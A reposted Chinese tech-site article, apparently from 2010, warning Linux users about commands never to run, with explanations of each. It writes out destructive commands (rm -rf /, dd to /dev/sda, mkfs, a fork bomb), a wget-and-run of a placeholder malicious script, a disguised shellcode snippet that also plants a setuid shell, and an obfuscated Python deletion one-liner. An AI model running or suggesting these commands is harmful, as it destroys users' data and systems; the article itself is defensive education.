当前位置:七道奇文章资讯安全技术网络技术
日期:2010-06-24 00:04:00  来源:本站整理

在Linux系统下千万不能运行的号令[网络技术]

赞助商链接



  本文“在Linux系统下千万不能运行的号令[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

Linux下千万千万不要运行的号令
 
 
文章录入:浣花溪    责任编辑:snow  14 
 【字体:小 大】
 
文中列出的号令绝对不可以运行,即便你认为很好奇也不行,除非你是在虚拟机上运行(呈现问题你可以复原),因为它们会实实在在的破坏你的系统.所以不在root等高级管理权限下履行号令是很好的习惯.
早晚有一天,Linux 系统会像 Windows 那样风行,用的人越来越多,包含对计算机不是很理解的人,本文的目的就是奉告大家:在 Linux 给你最大程度安闲度的同时,也使得破坏系统变得越发简单,假如你不理解某些号令的意义,下载履行包含恶意号令的脚本,大概被骗运行某些号令,很简单让你哭都来不及.
这并非阐明 Linux 不安全,只是阐明在不理解 Linux ,和很不当心的人眼前,Linux 非常不安全.Windows 也好,Linux 也好,人本身才是最大的不安全因素.
下面的号令会删除你硬盘上的文件,rm 的 -r 递归删除,和 -f 强迫删除是很危险的选项,即便平常操作,也会碰到误删文件的情形.
sudo rm -rf /  删除根分区全部的文件
sudo rm -rf .    删除当前目录下的全部文件
sudo rm -rf *   同上
rm -rf * or rm -rf *.*   同上
rm -rf ~ / &     删除根分区和家目录,即便你不是root,家目录还是不能幸免.

一样,假如你不知道 mkfs.xxxx (xxxx 可以是 vfat、ext2、ext3、bfs……) 是格局化号令的话,运行下面的号令会擦除你的硬盘分区:
 sudo mkfs.xxxx

dd 是强盛的 IO 输入输出定向工具,假如利用不当,破坏性很大,不但仅是当前分区,当前系统,有的时刻是整个硬盘.
sudo dd if=/dev/zero of=/dev/sda   全部硬盘清零.
sudo dd if=/dev/sda of=/dev/sdb     用第一块硬盘的内容覆盖第二块的内容.
sudo dd if=something of=/dev/sda    往硬盘上写垃圾数据.

同理,直接把号令后果定向到硬盘上,相当于往硬盘上写垃圾数据:
 any_command > /dev/sda              用随便的数据破坏硬盘

上面的 sda 、sdb 也大概是其他近似的名称.Linux 的 /dev 系统给操作硬件供应了很便利和强盛的功效,同时也使得破坏变得更简单.
fork 号令翻开一个子进程,假如把 fork 放在无限循环中,终究子进程会耗尽全部内存资源:
 :(){::&};:

这段不知所云的标记,可以让 Shell 不断的 fork 子进程,最后招致内存耗尽,不得不重启,这不是 bug,只是 Shell 语句成心写成简写的情势罢了.下面的同理:
 fork while fork

有的时刻,紧缩包也是一个破坏根源~
有的紧缩包要求你解压到某个系统中已经存在的目录中,这时刻你就要分外当心了,紧缩包里面大概有不计其数的小文件,以各种文件名尝试覆盖你现有的文件.
有的紧缩包看起来很小,但是解压出来是上 GB 的垃圾数据,会充斥你的硬盘.
从不正规网站下载的程序脚本,一样会有包含恶意号令的危险,不可随便履行:
wget http://some_place/some_file
sh ./some_file
wget http://.org/malicious-script
sh ./malicious-script

脚本要确保根源正规,假若有本领,可以阅读其代码.
即便有源代码程序,也不要随便编译履行:
 char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

上面看起来只是一堆没有意义的 16 进制数据,假若有人奉告你,运行这个程序你便可以不输入密码获得系统的 root 权限,你可不要相信他,上面的程序实际运行的是“rm -rf ~ / & ”.
python 一类的脚本语言,一样可以拿来搞破坏:
 python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg! "]))'

[1] [2]  下一页


  以上是“在Linux系统下千万不能运行的号令[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 在Linux系统下享用IPv6的畅快
  • 在Linux服务器上手工释放内存
  • 在Linux下安装配置MPICH2.1.4
  • <b>在linux上用arptables配置arp防火墙</b>
  • 在Linux下利用Nginx构建虚拟主机
  • 在Linux/Unix平台下安装MySQL
  • 在Linux上踢除某个用户和账户安全
  • <b>在LINUX下探测硬件信息的号令</b>
  • 在Linux系统环境下配置java编译环境
  • <b>nginx在Linux下的安装办法</b>
  • <b>在Linux下安装Web程序一样简单,一条号令搞定</b>
  • 金笛邮件服务器在Linux下的安装步骤
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .